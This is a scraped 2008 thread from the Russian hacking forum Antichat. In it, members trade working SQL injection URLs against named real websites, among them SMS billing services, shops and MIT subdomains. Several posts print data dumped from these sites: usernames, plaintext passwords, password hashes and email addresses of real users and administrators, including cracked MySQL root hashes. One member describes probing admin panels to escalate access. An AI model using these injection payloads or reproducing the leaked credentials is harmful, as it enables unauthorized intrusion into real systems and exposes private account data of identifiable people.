ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.06.2008, 15:13
|
|
Участник форума
Регистрация: 08.02.2008
Сообщений: 116
Провел на форуме:
1608432
Репутация:
158
|
|
www.pirok.ru/news.php?id=-1+union+select+1,2,name,4,password,6+from+admin/*
сверху логин, снизу пароль админа
Админка по адресу: www.pirok.ru/admin
|
|
|
14.06.2008, 15:28
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
различные смс-билинги:
Код:
http://www.3bill.com/casestudy.html?client_id=-1+UNION+SELECT+1,CONCAT(0x6472385F3838777777333371,concat(column_name),0x686874666638385F363632),3,4,5,6,7+FROM+information_schema.columns+where+table_name='clients'+limit+1,1/*
клиентская часть кстати на другой машине:
Код:
http://client.3bill.com/extranet/client_pages/cms/lib/exportXML.php?clientid=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*&service=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*&sort=ASC&sheet=detailList.xsl
Код:
client_name
description
client_logo
case_study
picture
sortorder
COLLATIONS
cc_audit
ccdata
charge_model
client_rights
clientrate
clientv2_adodblog
configuration
credit_status
creditnote_lines
creditnotes
cron_manager
prod_3bill:ccdata
cc_audit
ccdata
charge_model
client_rights
clientrate
clientv2_adodblog
configuration
credit_status
creditnote_lines
creditnotes
cron_manager
cron_manager_log
defaultrate
defaultrate_copy
delivery_method
показун:
Код:
http://www.pokazun.ru/sms.php?showDescr=1&pl=1100+union+select+1+from+users_advPlaces/*
посимвольным брутом..
ещё 1 буржуйский с пр6:
Код:
http://mblox.com/news/press-announcements/press_release.php?press_id=11'+UNION+SELECT+1,concat(email_name,0x3b,email),3,4,5,6,7+FROM+careers+limit+1,1/*
Код:
mbloxwebdb:careers
mbloxwebdb:contact_us_countries
mbloxwebdb:doc_reg
mbloxwebdb:enquiry
mbloxwebdb:events
mbloxwebdb:industry_news
mbloxwebdb:press_release
mbloxwebdb:short_code
mbloxwebdb:careers
mbloxwebdb:contact_us_countries
mbloxwebdb:doc_reg
mbloxwebdb:enquiry
mbloxwebdb:events
mbloxwebdb:industry_news
mbloxwebdb:press_release
mbloxwebdb:short_code
career_id
department
title
location
description
email
email_name
publish
id
local
country
send_to
id
name
email
company
country
browser
ip
date_created
id
name
email
telephone
company
country
country_other
industry
enquiry
sentto
browser
ip
date_created
event_id
title
location
date
enddate
message
logo
minilogo
email
event_link
info_link
shortcode_id
shortcode
country
company
phone_number
так что грабить смсками растяжимое понятие)
на последок старичок:
Код:
http://www.digiseller.ru/outside/default.asp?searchstr=--
может кто то и раскрутит) |
|
|
|
14.06.2008, 17:27
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
RussianSt.com - Русскоязычный Портал: Интернет-Каталог, Каталог Бизнесов, Аукцион, Почта, Доски Объявлений, Форум, Чат, Развлечения, Справочная..
http://www.russianst.com/mobile/phone.php?p=-1+union+select+concat_ws(0x3a,login,password,email )+from+AUSER/*
andylv:andy2a:andylv@ukr.net
eliz:Godisov:eliz@r66.ru
http://www.russianst.com/mobile/phone.php?p=-1+union+select+concat_ws(0x3a,login,password,email )+from+firm/*
madina:b98facb4a69f2a46b22a54890e2b60f1:madina@qui ntetmortgage.com
rusworld:e04e5ecd5ef138690e3ec40a486ea6a1:RussianW orld@hotmail.com
bexpress:42c391321d55118cf2ce5e33964edb33:RussianW orld@hotmail.com
http://www.russianst.com/mobile/phone.php?p=-1+union+select+concat_ws(0x3a,name,password,email) +from+chat_users/*
admin:MfPlkg:work@russianst.com
ADMINISTRATOR:3JOIQm:www@russianst.com
http://www.russianst.com/mobile/phone.php?p=-1+union+select+concat_ws(0x3a,login,password,email )+from+meet_board/*
glas1976:Ls38T:qwe-80@bk.ru
znax:M7hli:znax@bk.ru
Forsems:C0apt:nvtraderu@gmail.com
http://www.russianst.com/mobile/phone.php?p=-1+union+select+concat_ws(0x3a,login,password,email )+from+sell_board/*
m8t4t0o0w3v8:guNo4:f2k7j0c6o0s5@gmail.com
1363716:cHS39:infobalt3@yandex.ru
werxerty:NQU2G:malcom2007@km.ru
http://www.russianst.com/mobile/phone.php?p=-1+union+select+concat_ws(0x3a,login,password,email )+from+service_board/*
vjgfp:GmOj3:mopaz_market@kaluga.ru
gribok:O1lB9:gribka-net@yandex.ru
computp:0GHNA:uslugicomp@yandex.ru
http://www.russianst.com/mobile/phone.php?p=-1+union+select+concat_ws(0x3a,login,password,email )+from+work_board/*
virusds:fo3e1:financialfreedom@mail.ru
pav--eldm:4YW0y:paveldmitriev@bk.ru
piciolog:OOOQX:piciolog@tut.by
Последний раз редактировалось ~!DoK_tOR!~; 14.06.2008 в 17:30..
|
|
|
|
14.06.2008, 20:52
|
|
Новичок
Регистрация: 12.01.2008
Сообщений: 8
Провел на форуме:
39279
Репутация:
25
|
|
http://www.minskvodstroy.by/index.php?p=gallerypic&img_id=-86+union+select+1,2,3,concat_ws(char(124),email,pa ss),5,6,7,8,9+from+minbud_user+limit+2,1--&galid=6&area=1&ascdesc=desc
1 cdea86d0b320a9485cc1ab925603d4ab ytrewq admin@minskvodstroy.by
Там еще шел лежит )) 
Последний раз редактировалось Toxic; 14.06.2008 в 20:55..
|
|
|
|
15.06.2008, 00:35
|
|
Moderator - Level 7
Регистрация: 07.03.2008
Сообщений: 568
Провел на форуме:
4140471
Репутация:
708
|
|
Код:
http://azart.net.ua/bookmakers/catalog/?SECT=-1'+union+select+concat('%3Cbr%3E',version(),'%3Cbr%3E',user(),'%3Cbr%3E',database())/*
|
|
|
|
15.06.2008, 03:18
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Comingsoon.net
http://www.comingsoon.net/films.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user())--
вывод в <meta name="DESCRIPTION" content="4.1.22:comingso_nextra:comingso_nextra@cs n-node1-int">
Aen.ru
http://www.aen.ru/?page=article&category=politics&article_id=-1+union+select+1,aes_decrypt(aes_encrypt(version() ,0x71),0x71),3,4,5,6,7/*
Bmoca.org
http://www.bmoca.org/artist.php?id=1+UNION+SELECT+1,username,3,4,passwo rd,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25+from+users--
Eicta.org
http://www.eicta.org/index.php?id=32&id_article=-1+union+select+unhex(hex(version())),2,3,4,5,6,7,8 ,9,10,11,12--
Bti.cornell.edu - Еда
http://bti.cornell.edu/pgrp/pgrp.php?id=201'
Freedocumentaries.org
http://freedocumentaries.org/film.php?id=-1+union+select+1/*
подбор?
Umpcportal.com
http://www.umpcportal.com/products/product.php?id=1'
скуль?
Последний раз редактировалось sabe; 15.06.2008 в 12:44..
|
|
|
|
15.06.2008, 06:06
|
|
Познающий
Регистрация: 22.09.2007
Сообщений: 42
Провел на форуме:
255505
Репутация:
22
|
|
небольшой магазин
http://www.landmetzgerei.at/
http://www.landmetzgerei.at/cart.php?action=add&id=-1+union+select+1,2,3,4,5,6,7,8,9/*
а вот если user() или version() пытаюсь подставлять, то сервак ругается =( думаю можно было пробовать криптовать, но сейчас уже глаза слипаются чтоб с ним воевать если кому-то интересно можете добить
|
|
|
|
15.06.2008, 08:20
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463
Репутация:
97
|
|
Лови:
http://www.landmetzgerei.at/cart.php?action=add&id=-1+union+select+1,2,convert(concat_ws(0x3A3a,versio n(),user(),database())+using+latin1),4,5,6,7,8,9/*
Таблицы не подбирал, это уж сам давай.
_____________________________
Цель - media.mit.edu, пр8, начал копать
http://affect.media.mit.edu/projects.php?id=-1935+union+select+1,2,3,concat_ws(0x3A3a,user,pass word),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23+from+mysql.user/*
таблицы не подобрал.
Хеши которые сбрутились:
Quote:root::1c3b7f0b58c961df :: DufwtDB!
antigroupware::3f6686f4521deef9 :: wonderful
rcaneel::0d90c1511e59b951 :: failsafe
остальные в очереди.
На madnet.name/tools/madss/ пробил по ReverseIp, сайтов там на серваке стопицотсотинтыщь.
Куда с этим рутом коннектицца я х.з. phpmyadmin нужный не нашёл, накопал lyme.media.mit.edu/pmadmin/ ,там авторизация, пассы канешн неподходят.
Лезу _http://lyme.media.mit.edu/pmadmin/scripts/setup.php пустило, права видать криво стоят;
lyme.media.mit.edu/pmadmin/scripts/ просматриваем файло.Версия phpMyAdmin 2.11.2, уже с**** третяя за 3 дня.
Раскрытие путей-/var/www/cerebro.old/includes/, толку 0.
Этот грёбанный поддомен в списке сайтов от целевого на серваке не присутствует, он и под другим ip.
Куда вобщем с этим рутом лезть я не знаю.Делаю вывод, что раз media.mit.edu -- affect.media.mit.edu на одном серваке, значит рут (полученные пасс\логин) целевой. Но найти зацепку к коннекту немогу.
phpMyAdmin from lyme.media.mit.edu вообще фэйк какой то.Всё ужасно криво. Если кто что накопает, обьявите плз. Уже чисто ради интереса.
Последний раз редактировалось Imperou$; 15.06.2008 в 08:28..
|
|
|
|
15.06.2008, 09:10
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
если есть доступ к mysql.user.. как нащет file_priv?
сервак affect.media.mit.edu и mit.edu - разные айпишки... хотя универ один и тот же. наверника не один сервак у них и все запутано для безопасности.
mit.edu/admin - раскрытие путей.. (кое каких)
ты спрашивал про админку. думаю на этом сайте все держится.. кста как у всех универах должна быть система онлайн доступа к курсам и тд...
это большой универ и вобщем очень хороший. если б раскрутить, нас бы в новостях показали..))
Последний раз редактировалось sabe; 15.06.2008 в 09:25..
|
|
|
|
15.06.2008, 09:33
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
http://www.rosana.de
Код:
http://www.rosana.de/main.asp?main=-1'+union+select+1,concat_ws(0x3a,user,password),3,4,5,6+from+mysql.user/*
http://www.alpinestars.se
Код:
http://www.alpinestars.se/MainVisaUnderBild.asp?nid=1+or+1=(SELECT+TOP+1+cast(user+as+nvarchar)%2Bchar(58)%2Bcast(pwd+as+nvarchar)+FROM+users)--
|
|
|
|
|
|
|
|
Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
|
|
|
|
Похожие темы
Линейный вид
